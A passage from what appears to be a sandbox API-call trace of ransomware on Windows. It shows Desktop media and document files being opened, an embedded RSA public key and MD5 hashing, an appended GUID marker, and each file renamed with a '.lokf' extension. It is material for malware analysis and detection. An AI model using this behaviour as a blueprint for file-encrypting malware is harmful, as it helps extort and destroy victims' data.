hHeap=0x660000) returned 1 [0058.623] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x32679f8 [0058.623] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0058.623] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b89c8 | out: hHeap=0x660000) returned 1 [0058.623] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3292fe8 | out: hHeap=0x660000) returned 1 [0058.623] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32679f8 | out: hHeap=0x660000) returned 1 [0058.623] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0058.623] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0058.623] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0058.623] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32949c8 | out: hHeap=0x660000) returned 1 [0058.623] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296fa8 | out: hHeap=0x660000) returned 1 [0058.623] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0058.623] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6af98 | out: hHeap=0x660000) returned 1 [0058.623] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0058.623] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0058.623] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0058.624] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xaf64, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.624] WriteFile (in: hFile=0x5cc, lpBuffer=0x326a688*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326a688*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.624] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.624] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.624] CloseHandle (hObject=0x5cc) returned 1 [0058.625] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0058.625] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x880) returned 0x3268798 [0058.625] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\IiDoDihC33qoyQYC.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\iidodihc33qoyqyc.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\IiDoDihC33qoyQYC.avi.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\iidodihc33qoyqyc.avi.lokf")) returned 1 [0058.626] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc4e13d0, ftCreationTime.dwHighDateTime=0x1d4c696, ftLastAccessTime.dwLowDateTime=0x7e00560, ftLastAccessTime.dwHighDateTime=0x1d4c922, ftLastWriteTime.dwLowDateTime=0x7e00560, ftLastWriteTime.dwHighDateTime=0x1d4c922, nFileSizeHigh=0x0, nFileSizeLow=0x3ce0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jJW2khyR pNShGfzK.flv", cAlternateFileName="JJW2KH~1.FLV")) returned 1 [0058.626] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0058.626] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8a50 [0058.626] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jJW2khyR pNShGfzK.flv") returned=".flv" [0058.626] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jJW2khyR pNShGfzK.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jjw2khyr pnshgfzk.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.626] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=15584) returned 1 [0058.627] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.629] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x3cba, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.629] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.630] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.630] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x3ce0, lpOverlapped=0x0) returned 1 [0058.630] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.630] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0058.630] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.630] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.630] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b89c8) returned 1 [0058.631] CryptCreateHash (in: hProv=0x6b89c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.631] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0058.631] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.631] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0058.631] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0058.631] GetLastError () returned 0x0 [0058.631] CryptDestroyHash (hHash=0x327cb80) returned 1 [0058.631] CryptReleaseContext (hProv=0x6b89c8, dwFlags=0x0) returned 1 [0058.631] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0058.631] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0058.631] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.631] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0058.631] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0058.631] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0058.631] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x3ce0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.631] WriteFile (in: hFile=0x5cc, lpBuffer=0x326a688*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326a688*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.632] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.632] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.632] CloseHandle (hObject=0x5cc) returned 1 [0058.632] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0058.632] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x890) returned 0x3268798 [0058.632] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jJW2khyR pNShGfzK.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jjw2khyr pnshgfzk.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jJW2khyR pNShGfzK.flv.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jjw2khyr pnshgfzk.flv.lokf")) returned 1 [0058.634] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70cf0f40, ftCreationTime.dwHighDateTime=0x1d4ca66, ftLastAccessTime.dwLowDateTime=0x62315280, ftLastAccessTime.dwHighDateTime=0x1d4c93b, ftLastWriteTime.dwLowDateTime=0x62315280, ftLastWriteTime.dwHighDateTime=0x1d4c93b, nFileSizeHigh=0x0, nFileSizeLow=0x9625, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MKAZ57ez4L.mp3", cAlternateFileName="MKAZ57~1.MP3")) returned 1 [0058.634] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0058.634] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x76) returned 0x3289860 [0058.634] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MKAZ57ez4L.mp3") returned=".mp3" [0058.634] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MKAZ57ez4L.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mkaz57ez4l.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.635] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=38437) returned 1 [0058.635] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.637] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x95ff, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.637] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.638] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.638] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x9625, lpOverlapped=0x0) returned 1 [0058.638] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.638] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0058.638] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.638] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.638] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8a50) returned 1 [0058.639] CryptCreateHash (in: hProv=0x6b8a50, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.639] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0058.639] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.639] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0058.639] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0058.639] GetLastError () returned 0x0 [0058.639] CryptDestroyHash (hHash=0x327cb80) returned 1 [0058.639] CryptReleaseContext (hProv=0x6b8a50, dwFlags=0x0) returned 1 [0058.639] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0058.639] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0058.639] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.639] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0058.639] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0058.639] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0058.640] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x9625, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.640] WriteFile (in: hFile=0x5cc, lpBuffer=0x326a688*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326a688*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.640] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.640] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.640] CloseHandle (hObject=0x5cc) returned 1 [0058.641] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269478 [0058.641] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x880) returned 0x3268798 [0058.641] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MKAZ57ez4L.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mkaz57ez4l.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MKAZ57ez4L.mp3.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mkaz57ez4l.mp3.lokf")) returned 1 [0058.642] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcebe94b0, ftCreationTime.dwHighDateTime=0x1d4d275, ftLastAccessTime.dwLowDateTime=0xdff02520, ftLastAccessTime.dwHighDateTime=0x1d4d2c3, ftLastWriteTime.dwLowDateTime=0xdff02520, ftLastWriteTime.dwHighDateTime=0x1d4d2c3, nFileSizeHigh=0x0, nFileSizeLow=0xb1df, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NPYvWKI6z.rtf", cAlternateFileName="NPYVWK~1.RTF")) returned 1 [0058.642] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0058.642] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x76) returned 0x3289860 [0058.642] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NPYvWKI6z.rtf") returned=".rtf" [0058.642] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NPYvWKI6z.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\npyvwki6z.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.642] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=45535) returned 1 [0058.642] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.644] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xb1b9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.644] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.645] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.645] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xb1df, lpOverlapped=0x0) returned 1 [0058.645] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.646] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0058.646] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.646] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.646] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8a50) returned 1 [0058.646] CryptCreateHash (in: hProv=0x6b8a50, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.646] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0058.646] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.646] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0058.646] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0058.646] GetLastError () returned 0x0 [0058.647] CryptDestroyHash (hHash=0x327cb80) returned 1 [0058.647] CryptReleaseContext (hProv=0x6b8a50, dwFlags=0x0) returned 1 [0058.647] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0058.647] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0058.647] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.647] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0058.647] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0058.647] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0058.647] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xb1df, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.647] WriteFile (in: hFile=0x5cc, lpBuffer=0x326a688*, 